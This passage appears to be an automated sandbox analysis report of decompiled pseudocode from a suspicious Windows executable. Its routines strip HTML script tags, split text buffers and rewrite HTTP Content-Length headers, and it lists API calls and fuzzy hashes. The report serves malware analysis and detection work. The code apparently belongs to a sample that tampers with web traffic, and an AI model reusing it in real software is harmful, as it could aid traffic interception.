    				E00410820( &_v1056,  &_v668, 0x102);
    				_t99 =  &_v1556;
    				E00410820( &_v1556, 0x42eb80, 0x1e6);
    				E00412640( &_v1080, _t99, 0x1e6);
    				 *__edi = 0xe00;
    				 *(__edi + 4) = 0;
    				 *((intOrPtr*)(__edi + 8)) = 0x2020000;
    				 *((intOrPtr*)(__edi + 0x36)) = _v1094;
    				E0041D490(__edi + 0xc);
    				 *((intOrPtr*)(__edi + 0x3a)) = E0040F040;
    				 *((intOrPtr*)(__edi + 0x3e)) = E0040F070;
    				 *(__edi + 0x42) = 0;
    				E00410820(__edi + 0x46,  &_v1572, 0x78);
    				E00410820(__edi + 0xbe,  &_v1464, 0x10);
    				E00410820(__edi + 0xce,  &_v1460, 0x102);
    				_t76 = 0;
    				_t112 = __edi + 0x1d0;
    				if(_v1214 != 0) {
    					do {
    						_t76 = _t76 + 1;
    					} while ( *((char*)(_t121 + _t76 + 0x192)) != 0);
    				}
    				_push(_t118);
    				_t77 = MultiByteToWideChar(0, 0,  &_v1146, _t76, _t112, 0x104);
    				if(_t77 >= 0x104) {
    					_t77 = 0;
    				}
    				_t112[_t77] = 0;
    				_t78 = 0;
    				_t113 = _t109 + 0x3d8;
    				if(_v1126 != 0) {
    					do {
    						_t78 = _t78 + 1;
    					} while ( *((intOrPtr*)(_t121 + _t78 + 0x1aa)) != 0);
    				}
    				_t79 = MultiByteToWideChar(0, 0,  &_v1126, _t78, _t113, 0x104);
    				if(_t79 >= 0x104) {
    					_t79 = 0;
    				}
    				_t113[_t79] = 0;
    				_t80 = 0;
    				_t114 = _t109 + 0x5e0;
    				if(_v1106 != 0) {
    					do {
    						_t80 = _t80 + 1;
    					} while ( *((intOrPtr*)(_t121 + _t80 + 0x1be)) != 0);
    				}
    				_t81 = MultiByteToWideChar(0, 0,  &_v1106, _t80, _t114, 0x104);
    				if(_t81 >= 0x104) {
    					_t81 = 0;
    				}
    				_t114[_t81] = 0;
    				_t82 = 0;
    				_t115 = _t109 + 0x7e8;
    				if(_v1096 != 0) {
    					do {
    						_t82 = _t82 + 1;
    					} while ( *((intOrPtr*)(_t121 + _t82 + 0x1c8)) != 0);
    				}
    				_t83 = MultiByteToWideChar(0, 0,  &_v1096, _t82, _t115, 0xa);
    				if(_t83 >= 0xa) {
    					_t83 = 0;
    				}
    				_t115[_t83] = 0;
    				_t84 = 0;
    				_t116 = _t109 + 0x9f0;
    				if(_v1086 != 0) {
    					do {
    						_t84 = _t84 + 1;
    					} while ( *((intOrPtr*)(_t121 + _t84 + 0x1d2)) != 0);
    				}
    				_t85 = MultiByteToWideChar(0, 0,  &_v1086, _t84, _t116, 0xa);
    				if(_t85 >= 0xa) {
    					_t85 = 0;
    				}
    				_t116[_t85] = 0;
    				_t86 = 0;
    				_t117 = _t109 + 0xbf8;
    				if(_v1076 != 0) {
    					do {
    						_t86 = _t86 + 1;
    					} while ( *((intOrPtr*)(_t121 + _t86 + 0x1dc)) != 0);
    				}
    				_t87 = MultiByteToWideChar(0, 0,  &_v1076, _t86, _t117, 0xa);
    				if(_t87 >= 0xa) {
    					_t87 = 0;
    				}
    				_t117[_t87] = 0;
    				return E00410870(_t87,  &_v1544, 0, 0x1e6);
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,?,?,00000102,?,?,00000010,?,?,00000078), ref: 0040FD25
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FD6D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDAD
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDEA
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE2A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWide
    • String ID:
    • API String ID: 626452242-0
    • Opcode ID: 57640c5802e3739937cac81bd292fd6fc761685230f9e6cbd81225be922572b5
    • Instruction ID: f1e54da80d69ca8406bc3c17299e0b3cfc049142bcf35b73a2127b2e6d960b8b
    • Opcode Fuzzy Hash: 57640c5802e3739937cac81bd292fd6fc761685230f9e6cbd81225be922572b5
    • Instruction Fuzzy Hash: 7D61C0B16497407AE335DB20CC46FEBB7A9AF80704F00493EE68AE74C2D6B4715887D9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417690() {
    				void* __edi;
    				intOrPtr _t49;
    				intOrPtr _t52;
    				intOrPtr _t54;
    				signed int _t55;
    				char* _t56;
    				char _t58;
    				intOrPtr _t59;
    				char _t62;
    				void* _t64;
    				intOrPtr _t65;
    				signed char _t66;
    				char _t67;
    				signed char _t75;
    				int _t76;
    				intOrPtr _t79;
    				char* _t81;
    				char* _t82;
    				intOrPtr _t83;
    				char* _t85;
    				void* _t86;
    
    				_t83 =  *((intOrPtr*)(_t86 + 0x24));
    				_t75 = 0;
    				_t67 = 0;
    				_t65 = 0;
    				 *((char*)(_t86 + 0xf)) = 0;
    				 *((intOrPtr*)(_t86 + 0x14)) = 0;
    				 *((intOrPtr*)(_t86 + 0x10)) = 0;
    				if(_t83 <= 0) {
    					L43:
    					return  *((intOrPtr*)(_t86 + 0x10)) - _t75 + _t83;
    				} else {
    					while(1) {
    						_t79 =  *((intOrPtr*)(_t86 + 0x28));
    						if(_t65 == 0 ||  *((char*)(_t75 + _t79)) != 0x3e) {
    							goto L6;
    						}
    						_t65 = _t65 - 1;
    						L41:
    						_t83 =  *((intOrPtr*)(_t86 + 0x2c));
    						_t75 = _t75 + 1;
    						 *((intOrPtr*)(_t86 + 0x18)) = _t75;
    						if(_t75 < _t83) {
    							_t67 =  *((intOrPtr*)(_t86 + 0x13));
    							continue;
    						}
    						goto L43;
    						L6:
    						_t49 =  *((intOrPtr*)(_t75 + _t79));
    						if(_t49 != 0x3c) {
    							if(_t65 == 0 && _t67 == 0 && _t49 != 0xd && _t49 != 0xa && _t49 != 9) {
    								if(_t49 != 0x26 || _t83 - _t75 <= 5) {
    									L54:
    									 *((intOrPtr*)(_t86 + 0x14)) =  *((intOrPtr*)(_t86 + 0x14)) + 1;
    									 *((char*)( *((intOrPtr*)(_t86 + 0x14)) + _t79)) =  *((intOrPtr*)(_t75 + _t79));
    								} else {
    									_t36 = _t79 + 1; // 0x1
    									if(StrCmpNIA(_t75 + _t36, "nbsp;", 5) != 0) {
    										goto L54;
    									}
    									_t75 = _t75 + 5;
    									 *((intOrPtr*)(_t86 + 0x14)) =  *((intOrPtr*)(_t86 + 0x14)) + 1;
    									 *((char*)( *((intOrPtr*)(_t86 + 0x14)) + _t79)) = 0x20;
    								}
    							}
    							goto L41;
    						}
    						_t52 = _t65;
    						_t65 = _t65 + 1;
    						 *((intOrPtr*)(_t86 + 0x1c)) = _t65;
    						if(_t52 != 0) {
    							goto L41;
    						}
    						_t54 = _t83 - _t75;
    						 *((intOrPtr*)(_t86 + 0x20)) = _t54;
    						_t12 = _t79 + 1; // 0x1
    						_t85 = _t75 + _t12;
    						if(_t67 == 0) {
    							if(_t54 <= 6) {
    								L26:
    								_t66 = 0;
    								do {
    									_t55 = _t66 & 0x000000ff;
    									_t76 =  *(_t55 + 0x403604) & 0x000000ff;
    									if( *((intOrPtr*)(_t86 + 0x20)) <= _t76) {
    										goto L39;
    									}
    									_t56 =  *(0x4035d4 + _t55 * 4);
    									_t81 = _t85;
    									if( *_t85 == 0x3c) {
    										_t23 =  &(_t85[1]); // 0x2
    										_t81 = _t23;
    									}
    									if( *_t81 == 0x2f) {
    										_t81 =  &(_t81[1]);
    									}
    									if(StrCmpNIA(_t81, _t56, _t76) == 0) {
    										_t58 = _t81[_t76];
    										if(_t58 == 0 || _t58 == 0x20 || _t58 >= 9 && _t58 <= 0xd || _t58 == 0x3e || _t58 == 0x2f) {
    											_t59 =  *((intOrPtr*)(_t86 + 0x14));
    											 *((char*)(_t59 +  *((intOrPtr*)(_t86 + 0x28)))) = ("\n\n\n \n\n\n\n\n\n\n\nscript")[_t66 & 0x000000ff];
    											 *((intOrPtr*)(_t86 + 0x14)) = _t59 + 1;
    											break;
    										} else {
    											goto L39;
    										}
    									}
    									L39:
    									_t66 = _t66 + 1;
    								} while (_t66 < 0xc);
    								_t75 =  *((intOrPtr*)(_t86 + 0x18));
    								_t65 =  *((intOrPtr*)(_t86 + 0x1c));
    								goto L41;
    							}
    							_t82 = _t85;
    							if( *_t85 == 0x3c) {
    								_t16 =  &(_t85[1]); // 0x2
    								_t82 = _t16;
    							}
    							if( *_t82 == 0x2f) {
    								_t82 =  &(_t82[1]);
    							}
    							if(StrCmpNIA(_t82, "script", 6) != 0) {
    								goto L26;
    							} else {
    								_t62 = _t82[6];
    								if(_t62 == 0 || _t62 == 0x20 || _t62 >= 9 && _t62 <= 0xd || _t62 == 0x3e || _t62 == 0x2f) {
    									 *((char*)(_t86 + 0x13)) = 1;
    									goto L41;
    								} else {
    									goto L26;
    								}
    							}
    						}
    						if(_t54 > 7 &&  *_t85 == 0x2f) {
    							_t13 =  &(_t85[1]); // 0x2
    							_t64 = E00417650("script", _t13, 6);
    							_t75 =  *((intOrPtr*)(_t86 + 0x18));
    							if(_t64 != 0) {
    								 *((char*)(_t86 + 0x13)) = 0;
    							}
    						}
    						goto L41;
    					}
    				}
    			}

    APIs
    • StrCmpNIA.SHLWAPI(00000001,script,00000006,-00000008,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041775B
    • StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005,-00000008,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00417858
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: nbsp;$script
    • API String ID: 0-298180595
    • Opcode ID: e2aa87e31974b533fe62e56d96ebe3bf90485a6725c60df0017fbdb58cdd042e
    • Instruction ID: 1fce67ff949d7af4406b649d5b29bfcaff8bda0dbe5d1ac9be00ebf5a0302670
    • Opcode Fuzzy Hash: e2aa87e31974b533fe62e56d96ebe3bf90485a6725c60df0017fbdb58cdd042e
    • Instruction Fuzzy Hash: 1A51F07064C3869ACB319E18C4446EBBBF2AB52344F58095BE4E053391D72DE9CAC76E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00411430(void* __eax, signed int _a4, void* _a8, signed char _a12, intOrPtr _a16) {
    				signed int _v4;
    				void* __edi;
    				signed int _t45;
    				char* _t46;
    				void* _t48;
    				signed int _t49;
    				void* _t51;
    				void _t54;
    				intOrPtr* _t55;
    				signed int _t59;
    				void* _t61;
    				void* _t64;
    				char _t66;
    				signed int _t68;
    				long _t69;
    				void* _t70;
    				signed int _t73;
    				char* _t77;
    				void** _t78;
    				signed int _t85;
    				intOrPtr* _t88;
    				long _t89;
    				char* _t90;
    
    				_t90 = _a4;
    				_t64 = __eax + _t90;
    				_a4 = 0;
    				 *_a8 = 0;
    				if(_t90 >= _t64) {
    					L47:
    					return _a4;
    				} else {
    					_t45 = _a12 & 0x00000002;
    					_v4 = _t45;
    					while(1) {
    						_t88 = _t90;
    						_t46 = _t90;
    						if(_t45 == 0) {
    							goto L7;
    						} else {
    						}
    						while( *_t46 != _a16) {
    							_t46 = _t46 + 1;
    							if(_t46 < _t64) {
    								continue;
    							}
    							break;
    						}
    						_t85 = _t46 - _t90;
    						L15:
    						_t78 = _a8;
    						_t10 = _t46 + 1; // 0x74b05522
    						_t90 = _t10;
    						_t48 = 8 + _a4 * 4;
    						_t14 = _t48 - 4; // -4
    						_t69 = _t14;
    						if(_t69 != 0) {
    							_t70 =  *_t78;
    							_push(_t48);
    							if(_t70 != 0) {
    								_t49 = HeapReAlloc( *0x42e6d4, 8, _t70, ??);
    							} else {
    								_t49 = HeapAlloc( *0x42e6d4, 8, ??);
    							}
    							if(_t49 == 0) {
    								goto L40;
    							} else {
    								 *_a8 = _t49;
    								goto L24;
    							}
    						} else {
    							_t61 =  *_t78;
    							if(_t61 != 0) {
    								HeapFree( *0x42e6d4, _t69, _t61);
    							}
    							 *_a8 = 0;
    							L24:
    							if(_t85 == 0) {
    								L35:
    								if((_a12 & 0x00000001) != 0) {
    									_t54 =  *_a8;
    									_t73 = _a4;
    									_t55 = _t54 + _t73 * 4;
    									if( *((intOrPtr*)(_t54 + _t73 * 4)) != 0) {
    										E00410EC0( *_t55);
    									}
    								}
    								_a4 = _a4 + 1;
    								if(_t90 >= _t64) {
    									goto L47;
    								} else {
    									_t45 = _v4;
    									continue;
    								}
    							} else {
    								if(_t88 != 0) {
    									if(_t85 == 0xffffffff) {
    										_t59 = 0;
    										if( *_t88 != 0) {
    											do {
    												_t59 = _t59 + 1;
    											} while ( *((char*)(_t59 + _t88)) != 0);
    										}
    										_t85 = _t59;
    									}
    									_t18 = _t85 + 1; // 0x1
    									_t49 = _t18;
    									if(_t49 != 0) {
    										_t49 = HeapAlloc( *0x42e6d4, 8, _t49 + 4);
    										if(_t49 != 0) {
    											_t49 = E00410820(_t49, _t88, _t85);
    										}
    									}
    								} else {
    									_t49 = 0;
    								}
    								 *( *_a8 + _a4 * 4) = _t49;
    								if(_t49 == 0) {
    									L40:
    									_t89 = _a4;
    									if(_t89 != 0) {
    										do {
    											_t51 =  *(_a8 + _t89 * 4 - 4);
    											_t89 = _t89 - 1;
    											if(_t51 != 0) {
    												HeapFree( *0x42e6d4, 0, _t51);
    											}
    										} while (_t89 != 0);
    										_t49 = HeapFree( *0x42e6d4, _t89, _a8);
    									}
    									return _t49 | 0xffffffff;
    								} else {
    									goto L35;
    								}
    							}
    						}
    						goto L48;
    						while(1) {
    							L7:
    							_t66 =  *_t46;
    							if(_t66 == 0xa || _t66 == 0xd) {
    								break;
    							}
    							_t46 = _t46 + 1;
    							if(_t46 < _t64) {
    								continue;
    							}
    							break;
    						}
    						_t8 = _t46 + 1; // 0x74b05522
    						_t77 = _t8;
    						_t68 = _t46 - _t90;
    						if(_t77 < _t64 &&  *_t46 == 0xd &&  *_t77 == 0xa) {
    							_t46 = _t77;
    						}
    						_t85 = _t68;
    						goto L15;
    					}
    				}
    				L48:
    			}

    APIs
    • HeapFree.KERNEL32(?,-00000004,00000000), ref: 004114D4
    • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000,?,00000023,?,00424D37,?,?,00000002,00000026), ref: 004114F5
    • HeapReAlloc.KERNEL32(?,00000008,-00000004,00000000,?,00000000,?,00000023,?,00424D37,?,?,00000002,00000026), ref: 00411507
    • HeapAlloc.KERNEL32(?,00000008,74B0551E), ref: 0041154E
    • HeapFree.KERNEL32(?,00000000,?), ref: 004115C6
    • HeapFree.KERNEL32(?,-00000001,?), ref: 004115DD
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$AllocFree
    • String ID:
    • API String ID: 1379380650-0
    • Opcode ID: 7b618fbe25802d08a5fa4d2b253703fe6fabaca9aad1c1cc6cc6eea17163648a
    • Instruction ID: 40173d6a1d742a4caed00c022c0c96b4085e151d9f4ba36f6cb5989bc4053545
    • Opcode Fuzzy Hash: 7b618fbe25802d08a5fa4d2b253703fe6fabaca9aad1c1cc6cc6eea17163648a
    • Instruction Fuzzy Hash: 3951F6717042029FD724CF24D884BABB7E6AB95350F54052EE642CB371DB38DC85C799
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00413860(signed int* __esi) {
    				void* _t60;
    				void* _t63;
    				void* _t66;
    				void* _t68;
    				void* _t70;
    				void* _t73;
    				void* _t75;
    				signed int _t78;
    				signed int _t82;
    				signed int _t84;
    				signed int _t86;
    				signed int _t92;
    				signed int _t103;
    				signed int _t105;
    				signed int _t106;
    				signed int _t109;
    				signed int* _t114;
    
    				_t114 = __esi;
    				_t60 =  *__esi + 0x1000;
    				__esi[0x12] = 0;
    				__esi[0x13] = 0;
    				__esi[0x14] = 0;
    				__esi[0x15] = 0;
    				__esi[0x16] = 0;
    				__esi[0x17] = 0;
    				if(_t60 != 0) {
    					_t63 = HeapAlloc( *0x42e6d4, 8, _t60 + 4);
    				} else {
    					_t63 = 0;
    				}
    				_t114[0x12] = _t63;
    				_t114[0x13] = HeapAlloc( *0x42e6d4, 8, 0x40004);
    				_t66 = 0x2000 +  *_t114 * 4;
    				if(_t66 != 0) {
    					_t68 = HeapAlloc( *0x42e6d4, 8, _t66 + 4);
    				} else {
    					_t68 = 0;
    				}
    				_t114[0x14] = _t68;
    				_t70 = 0x2000 +  *_t114 * 4;
    				if(_t70 != 0) {
    					_t73 = HeapAlloc( *0x42e6d4, 8, _t70 + 4);
    				} else {
    					_t73 = 0;
    				}
    				_t114[0x15] = _t73;
    				_t114[0x16] = HeapAlloc( *0x42e6d4, 8, 0x40004);
    				_t75 = HeapAlloc( *0x42e6d4, 8, 0x40004);
    				_t109 = _t114[0x12];
    				_t114[0x17] = _t75;
    				if(_t109 == 0 || _t114[0x13] == 0 || _t114[0x14] == 0 || _t114[0x15] == 0) {
    					L29:
    					return 3;
    				} else {
    					_t100 = _t114[0x16];
    					if(_t114[0x16] == 0 || _t75 == 0) {
    						goto L29;
    					} else {
    						_t103 =  *_t114;
    						_t114[1] = 0x800;
    						_t114[2] = 0x800;
    						_t78 = _t103 + 0x800;
    						_t114[0xe] = _t78;
    						if(_t78 + 0x800 < 0xffffffff) {
    							_t114[0xf] = _t109 + _t78;
    							_t114[0x10] = _t103;
    							E00410870(_t78, _t100, 0, 0x40000);
    							E00410870(_t114[0x17], _t114[0x17], 0xffffffff, 0x40000);
    							_t82 = _t114[7];
    							_t104 =  *((intOrPtr*)(_t82 + 0x1c));
    							_t84 =  *((intOrPtr*)(_t82 + 0x24)) -  *((intOrPtr*)(_t82 + 0x1c));
    							_t114[0xb] = 0;
    							_t114[9] = 0;
    							_t114[0xa] = 0;
    							_t114[0xc] = 0;
    							_t114[0x11] = 0;
    							_t114[5] = _t84;
    							if(_t84 != 0) {
    								if(_t84 > 0x800) {
    									_t114[5] = 0x800;
    								}
    								E00410820(_t114[0x12], _t104, _t114[5]);
    								_t106 = _t114[5];
    								 *((intOrPtr*)(_t114[7] + 0x1c)) =  *((intOrPtr*)(_t114[7] + 0x1c)) + _t106;
    								_t114[0xb] = _t114[0xb] + _t106;
    							}
    							if(_t114[0xb] == _t114[0xe]) {
    								_t114[0xb] = 0;
    							}
    							if(_t114[5] >= 2) {
    								_t92 = _t114[0xa];
    								if(_t92 > 0) {
    									_push(_t92);
    									E004137B0(_t114);
    								}
    							}
    							_t86 = _t114[0x11];
    							_t105 = _t114[0x10];
    							_t114[0xd] = _t86;
    							if(_t86 < _t105) {
    								_t114[0xd] = _t86 - _t105 + _t114[0xe];
    								return 0;
    							} else {
    								_t114[0xd] = _t86 - _t105;
    								return 0;
    							}
    						} else {
    							return 1;
    						}
    					}
    				}
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000008,-00001004,?,00000000,0041446B), ref: 00413895
    • HeapAlloc.KERNEL32(?,00000008,00040004), ref: 004138A8
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 004138CB
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 004138ED
    • HeapAlloc.KERNEL32(?,00000008,00040004), ref: 00413900
    • HeapAlloc.KERNEL32(?,00000008,00040004), ref: 00413913
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocHeap
    • String ID:
    • API String ID: 4292702814-0
    • Opcode ID: bf33fe18a9401a47536c5ddb2f760b751d91835a1b35a0426ef8c13718ac60ba
    • Instruction ID: fe1889f02a0941dc290db51465094c4ecc9f8dcee98c3e512a43076f146f97b6
    • Opcode Fuzzy Hash: bf33fe18a9401a47536c5ddb2f760b751d91835a1b35a0426ef8c13718ac60ba
    • Instruction Fuzzy Hash: 0B5135B0A00B008FC330DF6AD980A57F7E5BF98715B50492EE186C7A60D675F9858F58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00411600(signed int __eax, signed int _a4) {
    				signed short* _v4;
    				void* __edi;
    				signed short* _t34;
    				void* _t36;
    				signed int _t37;
    				void* _t39;
    				void _t42;
    				intOrPtr* _t43;
    				signed int _t45;
    				void* _t48;
    				signed short* _t50;
    				signed short* _t51;
    				signed int _t52;
    				signed short* _t53;
    				long _t54;
    				void* _t55;
    				signed int _t57;
    				signed short* _t59;
    				signed int _t66;
    				signed short* _t69;
    				long _t70;
    				void* _t71;
    
    				_t71 = _a4;
    				_t69 = _t51;
    				_t59 =  &(_t69[__eax]);
    				_v4 = _t59;
    				_a4 = 0;
    				 *_t71 = 0;
    				if(_t69 >= _t59) {
    					L32:
    					return _a4;
    				} else {
    					do {
    						_t50 = _t69;
    						_t34 = _t69;
    						while(1) {
    							_t52 =  *_t34 & 0x0000ffff;
    							if(_t52 == 0xa || _t52 == 0xd) {
    								break;
    							}
    							_t34 =  &(_t34[1]);
    							if(_t34 < _t59) {
    								continue;
    							}
    							break;
    						}
    						_t6 =  &(_t34[1]); // 0x0
    						_t53 = _t6;
    						_t66 = _t34 - _t69 >> 1;
    						if(_t53 < _t59 &&  *_t34 == 0xd &&  *_t53 == 0xa) {
    							_t34 = _t53;
    						}
    						_t7 =  &(_t34[1]); // 0x4
    						_t69 = _t7;
    						_t36 = 8 + _a4 * 4;
    						_t11 = _t36 - 4; // -4
    						_t54 = _t11;
    						if(_t54 != 0) {
    							_t55 =  *_t71;
    							_push(_t36);
    							if(_t55 != 0) {
    								_t37 = HeapReAlloc( *0x42e6d4, 8, _t55, ??);
    							} else {
    								_t37 = HeapAlloc( *0x42e6d4, 8, ??);
    							}
    							if(_t37 == 0) {
    								goto L33;
    							} else {
    								 *_t71 = _t37;
    								goto L19;
    							}
    						} else {
    							_t48 =  *_t71;
    							if(_t48 != 0) {
    								HeapFree( *0x42e6d4, _t54, _t48);
    							}
    							 *_t71 = 0;
    							L19:
    							if(_t66 == 0) {
    								goto L29;
    							} else {
    								_t45 = _t66;
    								if(_t50 != 0) {
    									if(_t66 == 0xffffffff) {
    										_t45 = 0;
    										if( *_t50 != 0) {
    											do {
    												_t45 = _t45 + 1;
    											} while (_t50[_t45] != 0);
    										}
    									}
    									_t15 = _t45 + _t45 + 2; // 0x2
    									_t37 = _t15;
    									if(_t37 != 0) {
    										_t37 = HeapAlloc( *0x42e6d4, 8, _t37 + 4);
    										if(_t37 != 0) {
    											_t37 = E00410820(_t37, _t50, _t68);
    										}
    									}
    								} else {
    									_t37 = 0;
    								}
    								 *( *_t71 + _a4 * 4) = _t37;
    								if(_t37 == 0) {
    									L33:
    									_t70 = _a4;
    									if(_t70 != 0) {
    										do {
    											_t39 =  *(_t71 + _t70 * 4 - 4);
    											_t70 = _t70 - 1;
    											if(_t39 != 0) {
    												HeapFree( *0x42e6d4, 0, _t39);
    											}
    										} while (_t70 != 0);
    										_t37 = HeapFree( *0x42e6d4, _t70, _t71);
    									}
    									return _t37 | 0xffffffff;
    								} else {
    									goto L29;
    								}
    							}
    						}
    						goto L40;
    						L29:
    						_t42 =  *_t71;
    						_t57 = _a4;
    						_t43 = _t42 + _t57 * 4;
    						if( *((intOrPtr*)(_t42 + _t57 * 4)) != 0) {
    							E00410F50( *_t43);
    						}
    						_t59 = _v4;
    						_a4 = _a4 + 1;
    					} while (_t69 < _t59);
    					goto L32;
    				}
    				L40:
    			}

    APIs
    • HeapFree.KERNEL32(?,-00000004,00000000,?,00000000), ref: 00411688
    • HeapAlloc.KERNEL32(?,00000008,00000000,?,00000000), ref: 004116A7
    • HeapReAlloc.KERNEL32(?,00000008,-00000004,00000000,?,00000000), ref: 004116B9
    • HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 00411703
    • HeapFree.KERNEL32(?,00000000,?), ref: 00411773
    • HeapFree.KERNEL32(?,-00000001,00000000), ref: 00411785
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$AllocFree
    • String ID:
    • API String ID: 1379380650-0
    • Opcode ID: 98c4ba5c101567b861ee95d750b0499579127f21eedba7f10aeb34e2f366c013
    • Instruction ID: cfaddb5f366dec57997c2db34b8c7b3ad154c5ba29b699f22c439990f1092b7e
    • Opcode Fuzzy Hash: 98c4ba5c101567b861ee95d750b0499579127f21eedba7f10aeb34e2f366c013
    • Instruction Fuzzy Hash: 4651B3713002019BDB28DF15DC84BAB73A9EBA5310F58452AEA11CB3B0DB75DC85CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00407EF0(void* __eax) {
    				void* _t25;
    				signed int _t34;
    				long _t38;
    				void* _t40;
    				long _t43;
    				void* _t53;
    				char* _t56;
    				intOrPtr* _t57;
    				void* _t70;
    				char _t71;
    				void* _t74;
    				void* _t75;
    				intOrPtr _t76;
    				void* _t80;
    				signed int _t84;
    				void* _t86;
    				void* _t87;
    				void* _t88;
    				char* _t90;
    				signed int _t91;
    				void* _t95;
    
    				_t84 =  *(_t95 + 0x24);
    				_t53 = __eax;
    				_t25 = __eax + _t84;
    				if(_t25 == 0) {
    					L2:
    					return 0;
    				} else {
    					_t80 = HeapAlloc( *0x42e6d4, 8, _t25 + 4);
    					if(_t80 != 0) {
    						_t90 = _t95 + 0x14;
    						_t56 = _t90;
    						do {
    							_t34 = (0x66666667 * _t84 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t84 >> 0x20 >> 2);
    							 *((intOrPtr*)(_t95 + 0x10)) = _t34 + _t34 * 4 + _t34 + _t34 * 4;
    							_t70 = _t84 -  *((intOrPtr*)(_t95 + 0x10));
    							_t84 = _t34;
    							if(_t70 <= 9) {
    								_t71 = _t70 + 0x30;
    							} else {
    								_t71 = _t70 + 0x37;
    							}
    							 *_t56 = _t71;
    							_t56 = _t56 + 1;
    						} while (_t84 > 0);
    						_t86 = _t56 - _t95 + 0x14;
    						 *_t56 = 0;
    						_t57 = _t56 - 1;
    						do {
    							 *_t57 =  *_t90;
    							 *_t90 =  *_t57;
    							_t57 = _t57 - 1;
    							_t90 = _t90 + 1;
    						} while (_t90 < _t57);
    						_t91 =  *(_t95 + 0x24);
    						_push(_t95 + 0x24);
    						_push("Content-Length");
    						_push(_t53);
    						_push(_t91);
    						_t38 = E00417950();
    						if(_t38 != 0) {
    							_t74 = _t38 - _t91;
    							E00410820(_t80, _t91, _t74);
    							_t40 = E00410820(_t80 + _t74, _t95 + 0x18, _t86);
    							_t87 = _t86 + _t74;
    							_t75 = _t53 - _t74 -  *(_t95 + 0x24);
    							E00410820(_t80 + _t87,  *(_t95 + 0x24) + _t40, _t75);
    							_push(_t95 + 0x24);
    							_push(3);
    							_t88 = _t87 + _t75;
    							_push(_t88);
    							_push(_t80);
    							_t43 = E00417950();
    							if(_t43 != 0) {
    								_t76 =  *((intOrPtr*)(_t95 + 0x2c));
    								E00410820(_t43,  *((intOrPtr*)(_t95 + 0x28)), _t76);
    								 *( *(_t95 + 0x30)) = _t80;
    								return _t88 -  *((intOrPtr*)(_t95 + 0x20)) + _t76;
    							} else {
    								HeapFree( *0x42e6d4, _t43, _t80);
    								return 0;
    							}
    						} else {
    							HeapFree( *0x42e6d4, _t38, _t80);
    							return 0;
    						}
    					} else {
    						goto L2;
    					}
    				}
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000008,?,?,?,00000000,?), ref: 00407F0F
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,Content-Length,?,?,?,?,00000000,?), ref: 00407FA4
      • Part of subcall function 00417950: StrCmpNIA.SHLWAPI(?,?,00000000,00000000,?,?,?,?,00000000,004086C5,?,?,?), ref: 004179EE
    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 00408007
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
